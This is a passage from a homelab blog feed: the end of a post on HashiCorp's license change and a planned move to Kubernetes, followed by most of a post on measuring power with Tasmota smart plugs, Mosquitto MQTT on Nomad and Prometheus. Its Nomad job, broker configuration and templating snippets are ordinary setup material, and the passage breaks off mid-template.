HashiCorp does not currently offer Nomad or Consul hosted services. But they
do offer Terraform Cloud.</p>
<p>Terraform seems to be the biggest worry at the moment, at least from the posts
I saw. There is already an <a href="https://opentf.org/">OpenTF effort</a> ongoing. It is
first an appeal to HashiCorp to return Terraform to an Open Source license. But
it also threatens to fork Terraform from the last MPL release if the license is
not changed back:</p>
<blockquote>
<p>If HashiCorp is unwilling to switch Terraform back to an open source license, we propose to fork the legacy MPL-licensed Terraform and maintain the fork in the foundation. This is similar to how Linux and Kubernetes are managed by foundations (the Linux Foundation and the Cloud Native Computing Foundation, respectively), which are run by multiple companies, ensuring the tool stays truly open source and neutral, and not at the whim of any one company.</p></blockquote>
<p>What grates the most on me right now is how they did it from one day to the
other, with pretty much zero warning and no grace period at all. Granted, they
said they will backport fixes under the MPL to older releases for a while, but
they could have at least gone for a more user-friendly approach with a proper
grace period.</p>
<p>It&rsquo;s going to be interesting to see how this sudden course change works out for
them. It looks like they got hit as hard as everybody else by the end of the
zero interest rate era and the subsequent drying up of capital.</p>
<p>Or it might have something to do with them going public sometime last year. They
also had some lay-offs recently.</p>
<p>Might be that their business model simply doesn&rsquo;t work out and they are now
hoping for a cash infusion.</p>
<h1 id="so-what-about-the-hashicorp-homelab">So what about the HashiCorp Homelab?</h1>
<p>I&rsquo;m honestly still undecided how to continue with my Homelab. From my understanding,
the license change doesn&rsquo;t actually impact me at all. And the one licensing
aspect important to me is still there: Being able to look at the source code,
which helped me a lot when investigating some weird behaviors over the years.</p>
<p>Of course, with community contributions very likely sharply declining, I&rsquo;ve got
no idea how the tools I&rsquo;m currently using will develop.</p>
<p>But right now, I can only say this: At least for my Homelab use cases, the
HashiCorp tools are absolutely excellent. Both their usability and their
functionality are excellent, and there are a lot of far larger projects which
would be served well by docs half as good as HashiCorp&rsquo;s.</p>
<p>Their tools have been absolutely rock solid for me, and offered all of the
features I could have dreamed up.</p>
<p>So my biggest problem is not that I expect anything to stop working, or that
I don&rsquo;t like their tools. Rather, it leaves a bad taste in my mouth using them
now.</p>
<h1 id="alas">Alas&hellip;</h1>
<p>So what to do now? My Orchestrator is HashiCorp Nomad. My service discovery
and mesh networking is provided by HashiCorp Consul. My secrets for my Ansible
playbooks and Nomad jobs are stored in HashiCorp Vault. The disk images for all
of the hosts in my Homelab are created with HashiCorp Packer.
I use HashiCorp Terraform to configure all of the other HashiCorp tools.</p>
<p>A part of me has been thinking about taking the lab into a really weird direction,
namely deploying RedHat OpenShift. That might be a fun project. But tying my lab
to yet another Corporation is probably not the smartest of ideas. &#x1f609;</p>
<p>So while I don&rsquo;t want to tear everything down right now (I only finished the
current iteration of the Homelab last year!), this is still a welcome trigger
to dive into the deep end of Kubernetes.</p>
<p>Back when I first decided to expand my Homelab stack with an Orchestrator, I
looked at Kubernetes first - and then bounced from the sheer complexity of the
cluster setup. Specifically, I got to the &ldquo;Choose a CNI plugin&rdquo; section of the
docs. And after reading all the glossy pages of the different offerings, I did
not only not know which one to choose - I didn&rsquo;t even know <em>how</em> to make that
choice. But I want to give it at least a try now.</p>
<p>I&rsquo;m not yet entirely decided on which Kubernetes Distribution to choose, but
I&rsquo;m leaning towards just bog-standard k8s. I don&rsquo;t know why, but I&rsquo;ve always
leaned towards &ldquo;give me the vanilla experience&rdquo;, even when it&rsquo;s more painful
than the alternatives.</p>
<p>I would end up running the cluster on the same HW I&rsquo;m using now. With eight
Raspberry Pi CM4 making up the core of the workers, three Raspberry Pi 4 4GB
as control nodes and three x86 machines which currently run my Ceph cluster.</p>
<p>That&rsquo;s one thing I&rsquo;m genuinely interested in: <a href="https://rook.io/">Rook Ceph</a>,
which is a Ceph cluster run inside a Kubernetes cluster. This would make the
rather more beefy x86 machines available for other workloads as well, in what&rsquo;s
called a &ldquo;hyperconverged&rdquo; infra, if I&rsquo;m not mistaken. One of my biggest worries
about this part of the plan is whether I can somehow transform my current Ceph
cluster into a Ceph Rook cluster running on Kubernetes.</p>
<p>But until then, there&rsquo;s still a lot of research I have to do. The goal would
be to end up with a cluster that does pretty much the same as my current one.</p>
<p>In no particular order, here is what I will have to figure out:</p>
<ul>
<li>Service discovery, preferably via DNS and usable outside the cluster as well</li>
<li>Cluster networking with per-service permissions, to replace Consul Connect</li>
<li>Secrets management that&rsquo;s not just usable inside the cluster, but also for
things like my Ansible playbooks</li>
<li>Config file handling. I don&rsquo;t really like the &ldquo;Dump everything into env vars&rdquo;
approach for cloud native apps, and make heavy use of Nomad&rsquo;s consul-template
integration, also to e.g. insert secrets into config files</li>
<li>Ingress, which I would like to keep using Traefik for. Here it looks like that
should be possible, as e.g. k3s already ships with Traefik for ingress by default</li>
<li>Job definitions in one place/file instead of the half a dozen Yaml files it
looks like Kubernetes needs? Perhaps my very own Helm repo is the solution here?</li>
<li>Does k8s actually run properly on Raspberry Pis?</li>
<li>Cluster shutdowns and reboots, without having to stop every single job by hand</li>
<li>How to set up the networking? From what I understand, Kubernetes uses a separate
cluster network</li>
</ul>
<p>What I don&rsquo;t think I will do is going the GitOps route via e.g. ArgoCD. To setup
something like that, I would most likely need to run the necessary tools, including
Gitea and all of its dependencies, outside the cluster. A thought I&rsquo;ve never liked,
because it means having to maintain two completely separate environments.</p>
<h1 id="the-plan-for-now">The Plan for now</h1>
<p>To begin with, I will dig up my homeserver from the days when my Homelab only
consisted of a single machine. That has an Intel i7 10700 8c/16t CPU. And if my
inventory is correct, I should have 64 GB of unused RAM somewhere, as well as
about 1TB worth of SATA SSDs.</p>
<p>I will most likely just put Ubuntu on it and run LXD for the VMs, just because
I&rsquo;m familiar with LXD VMs from my previous Homelab iteration. Then I will set up 3 4GB VMs for the controller nodes,
because that&rsquo;s how much RAM my three controller Raspberry Pis have. The rest
will then go to the worker VMs.</p>
<p>The idea is to then experiment with the Kubernetes cluster until I have all
moving parts I want in place, preferably including an example Ceph Rook cluster.
That will give me enough time and space to spend some weekends experimenting
with a Kubernetes Homelab.</p>
<p>Also, for the first time in a very long time, at least part of my Homelab will
be for genuine experimentation, instead of being purely a HomeProd setup. :slight_smile:</p>
<p>Once all of that is done, the future direction of HashiCorp&rsquo;s tools will likely
have become a lot clearer, and I can then - after not even two years -
decide the fate of the HashiCorp Homelab. Regardless of the outcome of my
Kubernetes experiment, I had a lot of fun with the HashiCorp tools.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Power Measurements in the Homelab</title>
      <link>https://blog.mei-home.net/posts/power-measurement/</link>
      <pubDate>Tue, 13 Jun 2023 22:36:33 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/power-measurement/</guid>
      <description>Using smart plugs to measure power consumption in the Homelab with MQTT and Prometheus</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve long been wondering how much power my Homelab consumes, especially with
my switch from a single relatively beefy server to a gaggle of Raspberry Pis.</p>
<p>In the end, I put in three smart plugs supporting MQTT. I would have loved to
have per-machine power consumption stats, but I didn&rsquo;t want to invest that much
money into smart plugs.</p>
<p>To wet your appetite a bit, here is a snapshot of the resulting Grafana
dashboard:</p>
<figure>
    <img loading="lazy" src="grafana-dashboard.png"
         alt="A screenshot of three Grafana visualizations on a dashboard. The top one is headed &#39;Overall current power draw&#39;. The X axis has time on it, from 17:30h on 2023-04-20 to 17:00h 2023-04-27. The Y axis contains Watt numbers, from 0W to 300W. It contains three lines, labeled &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The deskright line goes down to 10W regularly during nighttime, while showing peaks to 300W with an average of 100W. The &#39;deskleft&#39; line switches between 30W and 6W, following the same pattern of low load during nighttime and high load during daytime. Both the deskleft and deskright lines fall off completely 6W and 10W after 2023.04.24. The &#39;homelab&#39; line starts out oscillating around 125W, but starts oscillating around 150W after 2023-04-23. It remains at that level even after deskright and deskleft go flat. The second graph is headed &#39;Total Power Draw. It#s a bar chart, with &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39; on the X axis and kWh going from 0 to 4 on the Y axis. It shows very short bars for deskleft and deskright below 1kWh, while the homelab bars are up to 3.5kWh. The last chart is headed &#39;Total power consumption last week&#39;. It has the weekdays on the X axis, going from Wednesday to Thursday. On the Y axis is power consumption in kWh again, going from 0 to 4. For the first Wednesday and Thursday, the consumption for the homelab is still around 3.05 kWh, but it increases 3.62 by Monday."/> <figcaption>
            <p>Screenshot of my power consumption dashboard.</p>
        </figcaption>
</figure>

<p>These plots are produced from two of the data points provided by my smart plugs,
namely the total current power draw, and the total daily consumption in kWh. I
will go into more detail on the plots later in this article.</p>
<p>I will show the setup of the <a href="https://github.com/arendst/Tasmota">Tasmota</a> based
smart plugs I bought. In addition, I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a>
as my MQTT message broker. The <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>
exporter does the conversion of MQTT messages from the plugs to the prometheus
format.</p>
<p>Here is an overview of the setup:</p>
<figure>
    <img loading="lazy" src="power_plugs_diagram.svg"
         alt="A diagram of the power plug setup. At the top, the Tasmota logo with the stylized home logo is copied three times, each copy having a label of &#39;plug 1&#39; to &#39;plug 3&#39;. Red arrows, labeled &#39;TCP/MQTT&#39; go from each of the Tasmota logos to a single OpenWRT logo. This logo is labeled &#39;WiFi router&#39;. From that router, a red arrow goes to the OPNsense logo, which is labeled &#39;firewall&#39;. From there, a blue arrow goes the Traefik proxy logo and another blue arrow goes from that to the Mosquitto MQTT broker logo. Finally, another blue arrow goes from a box labeled &#39;MQTT2Prometheus&#39; to the Mosquitto logo. A final blue arrow goes from the stylized torch logo of Prometheus to the MQTT2Prometheus box."/> <figcaption>
            <p>Overview of the power measurement setup. The red arrows mark the IoT VLAN, and the blue arrows mark the Homelab VLAN.</p>
        </figcaption>
</figure>

<p>After the setup, I will also give an overview of the information I got out of
this, to show the utility of a setup like this.</p>
<p>One question you might already have is: Why not Home Assistant? The answer is
pretty simple: I&rsquo;ve got no plans, at the moment at least, to go any further than
using the plugs to measure power consumption. There&rsquo;s going to be no automation.
So Home Assistant would be overkill for my purpose. If and when I start using
automations, I will reconsider. But for now, I&rsquo;m pretty happy with my &ldquo;several
tools doing one thing right approach&rdquo;, instead of Home Assistant&rsquo;s Swiss Army
knife approach.</p>
<h2 id="setting-up-an-iot-wifi">Setting up an IoT WiFi</h2>
<p>As I noted in a <a href="https://blog.mei-home.net/posts/vlans/">previous post</a>, I already
have a VLAN for my IoT devices. Until I installed the plugs, it was only home
to my VOIP DECT base station and my network printer.</p>
<p>Now, I need to extend that VLAN to a separate WiFi in my OpenWRT WiFi router.</p>
<p>The first step in doing so is to actually configure an additional WiFi for the
plugs.</p>
<figure>
    <img loading="lazy" src="openwrt_device_list.png"
         alt="A screenshot of OpenWRTs device list, with an entry called &#39;radio0&#39; with three buttons visible. The three buttons are &#39;Restart&#39;, &#39;Scan&#39; and &#39;Add&#39;."/> <figcaption>
            <p>Screenshot of the radio entry in the OpenWRT device list.</p>
        </figcaption>
</figure>

<p>Adding an additional WiFi in OpenWRT is pretty simple. Just chose the radio
you want to use in your device list (I&rsquo;ve got two for example, the 2.4 GHz and
the 5 GHz one). Then click the &ldquo;Add&rdquo; button, and a new window for configuring
the new WiFi will appear.</p>
<p>One important note: I&rsquo;m not 100% sure whether supporting multiple WiFis at once
is the default now, or whether it depends on the WiFi chipset any given AP uses.
So check yours to make sure before embarking on a big project. &#x1f609;</p>
<p>I gave the new WiFi a catchy name (okay, I just appended &ldquo;iot&rdquo; to my existing
WiFi&rsquo;s name &#x1f605;) and then hid the SSID. This isn&rsquo;t a security measure,
it just relieves the WiFi clutter a bit by hiding a WiFi which is not intended
to ever be used by humans.</p>
<p>One thing I found important to do: Enabling the &ldquo;Isolate Clients&rdquo; option
in the &ldquo;Advanced Settings&rdquo; tab. This prevents two clients on that WiFi from
talking to each other. My IoT devices will get to talk to exactly one thing,
my MQTT broker, and absolutely nothing else.</p>
<p>Next up is configuring the new WiFi to use the IoT VLAN. I will not go into
details here, as I&rsquo;ve already detailed the setup for a WiFi VLAN in my
<a href="https://blog.mei-home.net/posts/vlans/">detailed article on VLANs</a>, and there
were no special configs required for the IoT VLAN.
The only thing to mention on this is that the IoT VLAN is pretty much nailed
shut. The only outgoing connections allowed are to the Firewall itself, for
DHCP and DNS, and to the MQTT broker.</p>
<h2 id="the-plugs">The plugs</h2>
<p>The plugs I bought were <a href="https://de.athom.tech/blank-1/EU-plug">from Athom</a>. The
main draw was the relatively low cost, and the fact that they already come with
Tasmota pre-flashed. They also support a sufficiently high max load of 3680 Watts.</p>
<p>The advantage of using Tasmota is that it is an Open Source firmware, that
requires some configuration for different devices - but not individual rebuilds.
It&rsquo;s also independent of the vendor, which means I don&rsquo;t have to care at all
whether the manufacturer continues to support them or not. The plugs also have
an industry standard SoC, the <em>ESP8266</em>.</p>
<p>So in short: No cloud required! (Well, besides your own internal cloud,
depending on the size of your Homelab. &#x1f609;)</p>
<p>They are WiFi connected, which makes deployment a bit easier, with no new networking
equipment for e.g. Zigbee needed.</p>
<p>When first starting a fresh plug, or after resetting it, Tasmota starts the
WiFi chip in AP mode, so you can connect with your phone or another WiFi device.
Then it shows a website for configuring the WiFi the plug should be connecting
to.</p>
<p>After doing that configuration, the plug&rsquo;s MQTT settings also need to be
configured. But first we need to set up an MQTT broker - and explain what MQTT even
is.</p>
<p>Finally, a modest amount of security. Tasmota supports Basic Auth, which I
have set up to secure the Web UI. Go to &ldquo;Configuration&rdquo; -&gt; &ldquo;Configure Other&rdquo;
and enter a password under &ldquo;Web Admin Password&rdquo;.</p>
<h2 id="mqtt">MQTT</h2>
<p>Not having worked with MQTT ever before, I found <a href="https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt/">this series</a>
on it a pretty good introduction.</p>
<p>In principle, MQTT (Message Queuing Telemetry Transport) is a protocol for
transmitting metrics. It is kept deliberately simple, so that it can be
implemented easily on the low power chips of IoT devices.</p>
<p>MQTT is a pub/sub system. You&rsquo;ve got a central broker. Clients can then connect
to that broker and subscribe to topics, like &ldquo;power_plugs/living_room/plug3&rdquo; or
just &ldquo;power_plugs&rdquo; to receive all events other devices push to that topic. In
my setup, the Tasmota power plugs push to topics called <em>plugs/tasmota/tele</em>.</p>
<p>The messages pushed by MQTT clients are in JSON format. A message from the
plugs looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Time&#34;</span>: <span style="color:#e6db74">&#34;2023-06-08T22:01:44&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;ENERGY&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;TotalStartTime&#34;</span>: <span style="color:#e6db74">&#34;2023-02-01T21:57:12&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Total&#34;</span>: <span style="color:#ae81ff">405.918</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Yesterday&#34;</span>: <span style="color:#ae81ff">3.481</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Today&#34;</span>: <span style="color:#ae81ff">3.19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Period&#34;</span>: <span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Power&#34;</span>: <span style="color:#ae81ff">150</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ApparentPower&#34;</span>: <span style="color:#ae81ff">214</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ReactivePower&#34;</span>: <span style="color:#ae81ff">153</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Factor&#34;</span>: <span style="color:#ae81ff">0.7</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Voltage&#34;</span>: <span style="color:#ae81ff">233</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Current&#34;</span>: <span style="color:#ae81ff">0.918</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This is a message from my Homelab plug. The lab currently draws around 150 W,
at my local ~230 V, and today I had already used 3.19 kWh.</p>
<p>An MQTT broker can be observed with several tools, which can subscribe to all
or a subset of messages. I&rsquo;ve found <a href="https://mqtt-explorer.com/">MQTT Explorer</a>
to be working well for manual monitoring.</p>
<p>The plugs are also subscribed to specific topics. By publishing certain messages
to those topics, the plugs can for example be switched on and off. As I
mentioned above, I&rsquo;m not doing any automation, only energy consumption
measurement, so I&rsquo;m not using that feature at the moment.</p>
<p>From a security standpoint, MQTT supports user credentials and working over TLS.
More on those topics when I go over the Mosquitto setup.</p>
<h2 id="setting-up-the-mqtt-broker">Setting up the MQTT broker</h2>
<p>I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a> as my MQTT broker. Main reason:
It&rsquo;s open source, and it was mentioned by a lot of the other IoT open source
tools I&rsquo;ve been using.</p>
<p>It has an official Docker container <a href="https://hub.docker.com/_/eclipse-mosquitto">here</a>.
As always, I&rsquo;m deploying it in my Nomad cluster, with the following job config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;mqtt&#34;</span> {}
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mqtt&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">mqtt</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">HostSNI</span>(<span style="color:#960050;background-color:#1e0010">`*`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">entry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">HostSNI</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">mqtt</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.tcp.routers.mosquitto-tls.tls<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;eclipse-mosquitto:2.0.15&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/mosquitto/config&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-mosquitto&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/mosquitto/data&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mosquitto&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">dynamic</span> <span style="color:#e6db74">&#34;template&#34;</span> {
</span></span><span style="display:flex;"><span>        for_each <span style="color:#f92672">=</span> <span style="color:#66d9ef">fileset</span>(<span style="color:#e6db74">&#34;.&#34;, &#34;mosquitto/conf/*&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">content</span> {
</span></span><span style="display:flex;"><span>          data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#66d9ef">template</span>.<span style="color:#66d9ef">value</span>)
</span></span><span style="display:flex;"><span>          destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/${basename(template.value)}&#34;</span>
</span></span><span style="display:flex;"><span>          perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/passwd&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/passwd&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/mosquitto.conf&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/conf/mosquitto.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;ve cut a couple of tasks out of the above config, as they pertain to the
Prometheus exporters for the MQTT data. I will go into detail about them later.</p>
<p>As I always do, I&rsquo;m putting the service into a bridge network.</p>
<p>But in contrast
to my normal usage of Consul Connect networking to connect services, I&rsquo;m using
an exposed port, <code>mqtt</code>, here. The reason for this is that MQTT is a pure TLS/TCP
protocol. And these don&rsquo;t currently work together with Traefik as the ingress
proxy. While HTTPS is properly terminated in Traefik, and then re-encrypted with
the Consul Connect certs for the downstream connection, this currently does not
work right for pure TLS connections. There&rsquo;s a <a href="https://github.com/traefik/traefik/pull/9465">Traefik bug</a>, where a proxied pure TLS/TCP connection is
not properly re-encrypted with the Consul Connect certs. As a consequence, the
Consul connect network never forwards those packets properly. It looks like the
bug in Traefik has been fixed, but it has not been released yet.</p>
<p>So for now, my Mosquitto job&rsquo;s service is just that, a service, without Consul
connect integration. The one port that&rsquo;s just dangling openly in my network.
I really hope that Traefik fix gets released sometime soon.</p>
<p>I&rsquo;m still proxying all Mosquitto traffic through Traefik, though. This is
mostly due to my firewall. As all traffic is blocked by default for the IoT
VLAN, I need to open a port in the firewall to let the MQTT traffic into the
Homelab. But I don&rsquo;t really want all of my Homelab cluster hosts to be
accessible from the IoT VLAN. So instead, I have got one ingress host, running
Traefik, which then proxies to all my services. This ingress host is fixed, to
allow me to setup proper ingress rules. By then proxying everything through
Traefik, I only need this one ingress host, and I only need to pin Traefik to
it, while everything else can still be deployed however Nomad likes.
(This is not my externally accessible bastion host - that one isn&rsquo;t part of the
Nomad cluster.)</p>
<p>Besides the above, the only noteworthy thing to point out is the fact that
Mosquitto needs some local storage to work with.</p>
<p>Mosquitto&rsquo;s config itself is a little bit more involved. First, the main
config file:</p>
<pre tabindex="0"><code>listener 1883
socket_domain ipv4
allow_anonymous false
password_file /secrets/passwd
acl_file /mosquitto/config/acl.conf
connection_messages true
log_dest stdout
log_type all
persistence true
persistence_location /mosquitto/data
persistent_client_expiration 4w
</code></pre><p>This configures a listener on the standard MQTT port <code>1883</code>, disallows
any anonymous access and importantly configures ACLs and passwords.</p>
<p>Let&rsquo;s start with the passwords. The password file, in my case, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-go" data-lang="go"><span style="display:flex;"><span>{{ <span style="color:#66d9ef">range</span> <span style="color:#a6e22e">secrets</span> <span style="color:#e6db74">&#34;my_secrets/my_services/mosquitto/users/&#34;</span> }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">username</span> <span style="color:#f92672">:=</span> . }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#a6e22e">with</span> <span style="color:#a6e22e">secret</span> (<span style="color:#a6e22e">printf</span> <span style="color:#e6db74">&#34;my_secrets/my_services/mosquitto/users/%s&#34;</span> .) }}{{ <span style="color:#66d9ef">range</span> <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">k</span>, <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">v</span> <span style="color:#f92672">:=</span> .<span style="color:#a6e22e">Data</span> }}
